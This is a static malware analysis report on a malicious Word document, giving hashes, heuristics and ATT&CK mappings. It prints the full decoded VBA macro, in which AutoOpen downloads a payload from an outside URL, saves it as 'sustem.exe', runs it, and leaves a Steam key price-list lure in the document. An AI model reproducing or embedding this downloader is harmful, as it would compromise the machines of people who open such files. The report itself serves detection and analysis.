Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9f4539a6519bac34…

MALICIOUS

Office (OLE)

37.0 KB Created: 2014-06-13 19:43:00 Authoring application: Microsoft Office Word First seen: 2015-02-05
MD5: dedbfb668a93267cc7e696bddb86fa8f SHA-1: 13b7fda8cf1cab2f1f6bcf2703986df11f52d527 SHA-256: 9f4539a6519bac34a0d63908ae999e77de2535f2168faa494163ca85f585ca6c
270 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1071.001 Web Protocols

The sample contains VBA macros that utilize the URLDownloadToFile API to download a second-stage payload from 'http://uniluxvfc.com/plugins/qwewqda.scr'. The AutoOpen macro is designed to execute automatically when the document is opened, indicating a malicious intent to compromise the user's system. The presence of the URLDownloadToFile API and the embedded URL strongly suggests the execution of a downloaded script.

Heuristics 8

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            Shell (LocalFile)
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://uniluxvfc.com/plugins/qwewqda.scr Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2328 bytes
SHA-256: fb13914944ac5232679b44b811e96a19db26428968230fbc3798df246059802f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
#If VBA7 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function PathFileExists Lib "shlwapi" Alias "PathFileExistsA" _
(ByVal pszPath As String) As Long
Private Declare PtrSafe Function GetTempPath Lib "kernel32" Alias "GetTempPathA" _
                          (ByVal nBufferLength As Long, _
                           ByVal lpBuffer As String) _
                           As Long
#Else
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function PathFileExists Lib "shlwapi" Alias "PathFileExistsA" _
(ByVal pszPath As String) As Long
Private Declare Function GetTempPath Lib "kernel32" Alias "GetTempPathA" _
                          (ByVal nBufferLength As Long, _
                           ByVal lpBuffer As String) _
                           As Long
#End If

Sub AutoOpen()
Dim ret As Long
        Dim HTTPfile As String, LocalFile As String
        Dim sBuffer As String
        Dim sPath As String
        Dim lBufPath As Long
        
        sBuffer = Space(370)
        lBufPath = GetTempPath(370, sBuffer)
        sPath = Left$(sBuffer, lBufPath)

        HTTPfile = "http://uniluxvfc.com/plugins/qwewqda.scr"
        LocalFile = sPath & "sustem.exe"

        ret = URLDownloadToFile(0, HTTPfile, LocalFile, 0, 0)
        Dim CurDirBackup As String
        If PathFileExists(LocalFile) = 1 Then
        Shell (LocalFile)
        End If
        Selection.WholeStory
        Selection.Delete Unit:=wdCharacter, Count:=1
        Selection.TypeText Text:="Price keys : DOTA 2 -  2.5$ CSGO - 2$ Knifes -  70% of price Steam Market"
    
        
        End Sub